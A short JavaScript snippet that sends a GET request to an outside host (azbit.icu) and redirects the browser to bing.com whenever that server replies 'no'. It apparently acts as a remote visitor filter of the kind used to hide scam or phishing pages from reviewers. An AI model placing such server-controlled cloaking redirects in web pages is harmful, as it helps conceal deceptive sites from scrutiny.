function send(led_sts) 
{
  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
    if (this.responseText == "no") {
      
window.location="https://bing.com";

            }
            
      };
     	 xhttp.open("GET", "https://azbit.icu/?r=eb&"+led_sts, true);      
  		 xhttp.send();
    }
send();